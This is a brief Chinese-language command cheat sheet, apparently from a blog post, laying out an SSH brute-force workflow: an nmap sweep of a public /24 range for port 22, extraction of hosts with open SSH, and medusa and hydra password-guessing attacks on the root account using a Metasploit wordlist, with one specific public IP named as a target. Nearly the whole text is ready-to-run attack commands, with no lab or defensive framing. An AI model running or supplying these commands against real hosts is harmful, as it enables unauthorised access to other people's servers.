1.nmap
nmap -sV -p22 -oG ssh 69.163.190.0/24
2.整理IP
grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt
3.hydra&medusa
多条扫描
medusa -H ssh1.txt -u root -P /usr/share/wordlists/metasploit/unix_passwords.txt -M ssh
单条扫描
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://101.132.154.4
网友评论